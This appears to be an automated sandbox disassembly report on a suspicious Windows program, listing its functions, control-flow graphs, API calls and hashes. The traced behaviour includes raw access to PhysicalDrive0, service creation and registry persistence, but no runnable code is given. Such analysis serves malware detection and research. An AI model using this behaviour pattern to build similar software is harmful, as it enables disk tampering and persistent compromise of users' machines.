                                                                                                                                                          control_flow_graph 26 401a4f-401a77 CreateFileA 27 401b45-401b4a 26->27 28 401a7d-401a91 26->28 29 401a98-401ac0 DeviceIoControl 28->29 30 401ac2-401aca 29->30 31 401af3-401afb 29->31 34 401ad4-401ad9 30->34 35 401acc-401ad2 30->35 32 401b04-401b07 31->32 33 401afd-401b03 call 402cb6 31->33 38 401b09-401b0c 32->38 39 401b3a-401b44 FindCloseChangeNotification 32->39 33->32 34->31 36 401adb-401af1 call 402cd0 call 4018cc 34->36 35->31 36->31 42 401b27-401b34 call 402ca8 38->42 43 401b0e-401b17 GetLastError 38->43 39->27 42->29 42->39 43->39 46 401b19-401b1c 43->46 46->42 49 401b1e-401b24 46->49 49->42
                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                                                                                                                          • DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00401B0E
                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 00401B3D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ChangeCloseControlCreateDeviceErrorFileFindLastNotification
                                                                                                                                                          • String ID: \\.\PhysicalDrive0
                                                                                                                                                          • API String ID: 3786717961-1180397377
                                                                                                                                                          • Opcode ID: 89700505a12f282f270db25e62f1f83fcd7e168e5d3770c0c1e857fe250e7073
                                                                                                                                                          • Instruction ID: 4be7cd3f819721d39b4e681a90ac86abf8c5b8a7a35c169795375fcfafce56b7
                                                                                                                                                          • Opcode Fuzzy Hash: 89700505a12f282f270db25e62f1f83fcd7e168e5d3770c0c1e857fe250e7073
                                                                                                                                                          • Instruction Fuzzy Hash: 5E31AB71D00218EADB21EFA5CD809EFBBB8FF41750F20407AE514B22A0E3785E41CB98
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0040219E Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 185 40219e-40b26d StartServiceCtrlDispatcherA 187 40b273-40b2cd 185->187 189 40b2cf 187->189
                                                                                                                                                          APIs
                                                                                                                                                          • StartServiceCtrlDispatcherA.ADVAPI32 ref: 0040B26D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CtrlDispatcherServiceStart
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3789849863-0
                                                                                                                                                          • Opcode ID: dfc2fd661b0e71589403a0b6bcb61a3f08b740fc068a52e69b9749f0675b05af
                                                                                                                                                          • Instruction ID: c16949dc6f7d92ef07657f06252f9e68f57bbc9334b8c8a67b7c9c0b9e76a263
                                                                                                                                                          • Opcode Fuzzy Hash: dfc2fd661b0e71589403a0b6bcb61a3f08b740fc068a52e69b9749f0675b05af
                                                                                                                                                          • Instruction Fuzzy Hash: 2EA0027094C105DAD94157605E2C579251CEA0F3967215576510FB40E18B780156657F
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00402F22 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • GetVersion.KERNEL32 ref: 00402F48
                                                                                                                                                            • Part of subcall function 0040325A: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F81,00000000), ref: 0040326B
                                                                                                                                                            • Part of subcall function 0040325A: HeapDestroy.KERNEL32 ref: 004032AA
                                                                                                                                                          • GetCommandLineA.KERNEL32 ref: 00402F96
                                                                                                                                                          • GetStartupInfoA.KERNEL32(?), ref: 00402FC1
                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402FE4
                                                                                                                                                            • Part of subcall function 0040303D: ExitProcess.KERNEL32 ref: 0040305A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2057626494-0
                                                                                                                                                          • Opcode ID: c877abccd7b017b2008373a683c45a85b37785b71fb7751b95783a0f91bffb14
                                                                                                                                                          • Instruction ID: cc19e24f17b4650914cb2b9af9e4d353f3e23d4ad16f4765f21c486f210011ea
                                                                                                                                                          • Opcode Fuzzy Hash: c877abccd7b017b2008373a683c45a85b37785b71fb7751b95783a0f91bffb14
                                                                                                                                                          • Instruction Fuzzy Hash: F5219CB09407059ADB08EFA6DE09A6E7BB9EB44304F10413EFA05BB2D1DB384450DB99
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0040261B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15registryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 79 40261b-402626 RegQueryValueExA 80 40b93e 79->80 81 40b000-40b333 RegCloseKey call 402d90 80->81 82 40b944 80->82 86 40b338 81->86 84 40b946 82->84 84->84 86->80
                                                                                                                                                          APIs
                                                                                                                                                          • RegQueryValueExA.KERNELBASE ref: 0040261E
                                                                                                                                                          • RegCloseKey.KERNELBASE(?), ref: 0040B327
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseQueryValue
                                                                                                                                                          • String ID: JSON Nested Objects 66
                                                                                                                                                          • API String ID: 3356406503-4184186574
                                                                                                                                                          • Opcode ID: 1824a804e9f496e40159f017b9fd672c87ce2b4c5c441e96737de9040545891f
                                                                                                                                                          • Instruction ID: aa3bd1ae59daaa3fa17d745cbcdd45fda04deab230bb4da5387f22543defac0c
                                                                                                                                                          • Opcode Fuzzy Hash: 1824a804e9f496e40159f017b9fd672c87ce2b4c5c441e96737de9040545891f
                                                                                                                                                          • Instruction Fuzzy Hash: 67D05E30D48106FAC7005F648F0D22E3AE4AE043447224837A513B40D0C77C8A026A5F
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0040417B Relevance: 4.5, APIs: 3, Instructions: 49COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 87 40417b-404185 88 404187-404192 GetCurrentProcess TerminateProcess 87->88 89 404198-4041ae 87->89 88->89 90 4041b0-4041b7 89->90 91 4041ec-404200 call 404214 89->91 92 4041b9-4041c5 90->92 93 4041db-4041eb call 404214 90->93 99 404212-404213 91->99 100 404202-40420c ExitProcess 91->100 96 4041c7-4041cb 92->96 97 4041da 92->97 93->91 101 4041cd 96->101 102 4041cf-4041d8 96->102 97->93 101->102 102->96 102->97
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,00404166,?,00000000,00000000,00402FF9,00000000,00000000), ref: 0040418B
                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,00404166,?,00000000,00000000,00402FF9,00000000,00000000), ref: 00404192
                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0040420C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                          • Opcode ID: 748a27256fc4a66d22ad641d8e31553254a5af63f1a9a9ffed707e388879ca4b
                                                                                                                                                          • Instruction ID: 4cd5c9d7fd323ee9f9fba8b951aaba01e6d7c1133379e8b4a76e772c1e30fa0f
                                                                                                                                                          • Opcode Fuzzy Hash: 748a27256fc4a66d22ad641d8e31553254a5af63f1a9a9ffed707e388879ca4b
                                                                                                                                                          • Instruction Fuzzy Hash: 9101F9B1648300DADA10AF55FD49A0A7BA4EBE0350B10457FF6517B2E1C77AA8D0CF2E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004028BC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13registryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 104 4028bc-4028ce RegOpenKeyExA 105 40b029 104->105 106 40b944 105->106 107 40b02f-40b88e 105->107 109 40b946 106->109 107->106 109->109
                                                                                                                                                          APIs
                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders), ref: 004028C6
                                                                                                                                                          Strings
                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 004028BC
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Open
                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                          • API String ID: 71445658-2036018995
                                                                                                                                                          • Opcode ID: 8cc03e39f8045248eaf5372112aea73b3a061bbebc5e36400c6faf603829526a
                                                                                                                                                          • Instruction ID: 5db498d58ea0626355dc5c30006fa577db79c1f6cc4ad4aa69c6d3308ce59601
                                                                                                                                                          • Opcode Fuzzy Hash: 8cc03e39f8045248eaf5372112aea73b3a061bbebc5e36400c6faf603829526a
                                                                                                                                                          • Instruction Fuzzy Hash: 60D0C97094810AEAE7109A608E09B7A66ACE704381F204A379C13B12D0D3B9820955AF
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0040325A Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 110 40325a-403278 HeapCreate 111 4032b0-4032b2 110->111 112 40327a-403287 call 403112 110->112 115 403296-403299 112->115 116 403289-403294 call 4032b7 112->116 118 4032b3-4032b6 115->118 119 40329b call 403b08 115->119 122 4032a0-4032a2 116->122 119->122 122->118 123 4032a4-4032aa HeapDestroy 122->123 123->111
                                                                                                                                                          APIs
                                                                                                                                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F81,00000000), ref: 0040326B
                                                                                                                                                            • Part of subcall function 00403112: GetVersionExA.KERNEL32 ref: 00403131
                                                                                                                                                          • HeapDestroy.KERNEL32 ref: 004032AA
                                                                                                                                                            • Part of subcall function 004032B7: HeapAlloc.KERNEL32(00000000,00000140,00403293,000003F8), ref: 004032C4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$AllocCreateDestroyVersion
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2507506473-0
                                                                                                                                                          • Opcode ID: bd4a8705c2f058e6f61ee79851f8c15e955d8a701f491e7a2775f6fe6ed1aa1f
                                                                                                                                                          • Instruction ID: 12b9d923cfd194162cf527058f048946e163d2adb3b2679e6a92d0a0525a53ee
                                                                                                                                                          • Opcode Fuzzy Hash: bd4a8705c2f058e6f61ee79851f8c15e955d8a701f491e7a2775f6fe6ed1aa1f
                                                                                                                                                          • Instruction Fuzzy Hash: BDF065709043015BEF205F316E4A7263EA89B50797F1448BFF501F82D1EB798B90A61A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0040258B Relevance: 3.0, APIs: 2, Instructions: 8registryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 124 40258b-40bbdd RegSetValueExA RegCloseKey 127 40bbe3 124->127 127->127
                                                                                                                                                          APIs
                                                                                                                                                          • RegSetValueExA.KERNELBASE(?), ref: 0040262B
                                                                                                                                                          • RegCloseKey.KERNELBASE(?), ref: 0040BBDD
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseValue
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3132538880-0
                                                                                                                                                          • Opcode ID: 64bc47f33c90e70bbdf2db1cf44d6d7190741509f106e33f28a2dc8678d8cccb
                                                                                                                                                          • Instruction ID: 6adb909d81279dae7e13fecbb686f1fdb7121ffba9fb2b0a18fd0c77bc900132
                                                                                                                                                          • Opcode Fuzzy Hash: 64bc47f33c90e70bbdf2db1cf44d6d7190741509f106e33f28a2dc8678d8cccb
                                                                                                                                                          • Instruction Fuzzy Hash: BAC04C30844005EBDB056B909F1C67D7E75EB04305F120071E103704A4C7791962AB5E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004026AC Relevance: 1.6, APIs: 1, Instructions: 61registryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 128 4026ac-4026ae 130 402630-402632 128->130 131 4026b0 128->131 132 402634 130->132 133 40262c 130->133 134 4026b2-4026b5 131->134 135 4026f8-4026fa 131->135 136 40bbdd RegCloseKey 132->136 133->130 137 4026b6-4026cd 134->137 138 4026a5-4026aa 135->138 139 4026fc-402741 135->139 145 40bbe3 136->145 140 402742-402747 137->140 141 4026cf 137->141 138->128 139->140 140->136 141->137 143 4026d1-4026db 141->143 143->135 145->145
                                                                                                                                                          APIs
                                                                                                                                                          • RegCloseKey.KERNELBASE(?), ref: 0040BBDD
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3535843008-0
                                                                                                                                                          • Opcode ID: 3aeeee875aa4cabdb657a14331ed515f64c60b5e88ed03ae7eeb00348f262562
                                                                                                                                                          • Instruction ID: 0a3fffb35b55b1e01443bd985c00acdcfbb5b69c3c4b678683b7e53cf568a20b
                                                                                                                                                          • Opcode Fuzzy Hash: 3aeeee875aa4cabdb657a14331ed515f64c60b5e88ed03ae7eeb00348f262562
                                                                                                                                                          • Instruction Fuzzy Hash: 2511AFB7500110DFCB22CF50DF8C1EA3BA0FF56350B214477D411AB2D2C37A8553899A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00402EAE Relevance: 1.5, APIs: 1, Instructions: 46memoryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 147 402eae-402ebb 148 402ed2-402ed5 147->148 149 402ebd-402ec3 147->149 150 402f04-402f06 148->150 151 402ed7-402edd 148->151 149->150 152 402ec5-402ece call 403653 149->152 156 402f08-402f0a 150->156 157 402f0b-402f0e 150->157 154 402ee7-402ee9 151->154 155 402edf-402ee5 151->155 152->150 162 402ed0-402ed1 152->162 159 402eea-402ef0 154->159 155->159 156->157 160 402f11-402f1a RtlAllocateHeap 157->160 159->160 163 402ef2-402f00 call 403e00 159->163 161 402f20-402f21 160->161 163->161 166 402f02 163->166 166->160
                                                                                                                                                          APIs
                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,00000000,00402E92,000000E0,00402E7F,?,00404853,00000100,?,00000000), ref: 00402F1A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                          • Opcode ID: 66789356bd00888105a6c91ff4dfb52d8ecebb81d0bee222744b9891a63f8538
                                                                                                                                                          • Instruction ID: 765fdeebac85905f4101f829938394dd68b44c118b6f92374405937e6060d87d
                                                                                                                                                          • Opcode Fuzzy Hash: 66789356bd00888105a6c91ff4dfb52d8ecebb81d0bee222744b9891a63f8538
                                                                                                                                                          • Instruction Fuzzy Hash: 08F0F43290422256EA20A714BF887C77364EB107B4F1A0537FE41BB2D0C3B8EC91A2CD
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0040B493 Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 167 40b493-40b49b CopyFileA 168 40bb85 167->168 169 40bb8b-40bb8d 168->169 170 4022ef-4022f0 168->170 169->168 173 40b04f 170->173 173->173
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CopyFile
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1304948518-0
                                                                                                                                                          • Opcode ID: 5497bbe63c888b5fcaa9e2707a56c17457b6eaaa9a4369e4f58c60f57812dabb
                                                                                                                                                          • Instruction ID: 8d00937566fd4dd7b7edcf529a3ecc8ad7eb961e3f71c3b2ada714d962b661d6
                                                                                                                                                          • Opcode Fuzzy Hash: 5497bbe63c888b5fcaa9e2707a56c17457b6eaaa9a4369e4f58c60f57812dabb
                                                                                                                                                          • Instruction Fuzzy Hash: CBC09B5018C101EBD15005944E4FF37326CCB54745F2404B73517705DE937C544270AF
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004028FD Relevance: 1.5, APIs: 1, Instructions: 10registryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 174 4028fd-40b960 RegCreateKeyExA 176 40b966-40b96b 174->176 177 402558-40b467 174->177 180 402305-40230a 177->180 181 40b46d call 4024d3 177->181 180->177 183 40b472-40b474 181->183 183->177 184 40b47a 183->184
                                                                                                                                                          APIs
                                                                                                                                                          • RegCreateKeyExA.KERNELBASE(80000002), ref: 0040B958
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Create
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2289755597-0
                                                                                                                                                          • Opcode ID: 121fb021d3d41a5ac7f9c30e588b87a110767b31ff2458fc081d950d04431ed5
                                                                                                                                                          • Instruction ID: 75409721579059e263a434d65e6b8cce5623d5619c58acf15d190f9cebe3b124
                                                                                                                                                          • Opcode Fuzzy Hash: 121fb021d3d41a5ac7f9c30e588b87a110767b31ff2458fc081d950d04431ed5
                                                                                                                                                          • Instruction Fuzzy Hash: C2C08030544119D6D710D700CE4DBA53374DB00700F100077E316F10C0D3789556D64E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0040B212 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 190 40b212-40b21a OpenSCManagerA 191 40b31f 190->191
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ManagerOpen
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1889721586-0
                                                                                                                                                          • Opcode ID: 231dc8a31b2bb7b97adb2f343c3c4fc5a072de4af1cab3b9222ceeb4d900e450
                                                                                                                                                          • Instruction ID: 32e33916c9bd7d11cb73b576be32e312a731320d9a1ae7e3a76c3e751fdee998
                                                                                                                                                          • Opcode Fuzzy Hash: 231dc8a31b2bb7b97adb2f343c3c4fc5a072de4af1cab3b9222ceeb4d900e450
                                                                                                                                                          • Instruction Fuzzy Hash: B2B01130808002EEC3008F208A8802C3AA2A280302B300C3AC203FA2E0C3B80082AE2E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0040B008 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 192 40b008-40b00e CreateDirectoryA
                                                                                                                                                          APIs
                                                                                                                                                          • CreateDirectoryA.KERNELBASE ref: 0040B008
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateDirectory
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4241100979-0
                                                                                                                                                          • Opcode ID: 2ee1b2209c7d92f0295a037889c2828dae7207670e9894e8d228c9cf7201a81b
                                                                                                                                                          • Instruction ID: ca426ecc0cec97c259be826b783d1f9562bd1de7f412ed967c6160a887a1dc29
                                                                                                                                                          • Opcode Fuzzy Hash: 2ee1b2209c7d92f0295a037889c2828dae7207670e9894e8d228c9cf7201a81b
                                                                                                                                                          • Instruction Fuzzy Hash: 74900225588150E6D10056585B0D5153574590474272181B37203B14D145FE10525A1F
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 0040259B Relevance: 3.0, APIs: 2, Instructions: 11serviceCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateServiceA.ADVAPI32 ref: 0040259B
                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 0040B489
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Service$CloseCreateHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1873643653-0
                                                                                                                                                          • Opcode ID: 87860bdca3a9e3488cb9bedef154d4cd967a6912ce68fa88749aba91491c2137
                                                                                                                                                          • Instruction ID: 156b1c4766efdc2507a1250fa3a0c7a8bcc478032e34b94fdbef6a3f91d5aa9f
                                                                                                                                                          • Opcode Fuzzy Hash: 87860bdca3a9e3488cb9bedef154d4cd967a6912ce68fa88749aba91491c2137
                                                                                                                                                          • Instruction Fuzzy Hash: 80C01230844018EACF144F508C5441E3E35D640310F118472D402765A0C3395E65BEDD
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004023B3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 75registrysynchronizationthreadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegisterServiceCtrlHandlerA.ADVAPI32(JSON Nested Objects 66,Function_0000235E), ref: 004023C1
                                                                                                                                                          • SetServiceStatus.ADVAPI32(0040A0A8), ref: 00402420
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00402422
                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00402450
                                                                                                                                                          • SetServiceStatus.ADVAPI32(0040A0A8), ref: 00402480
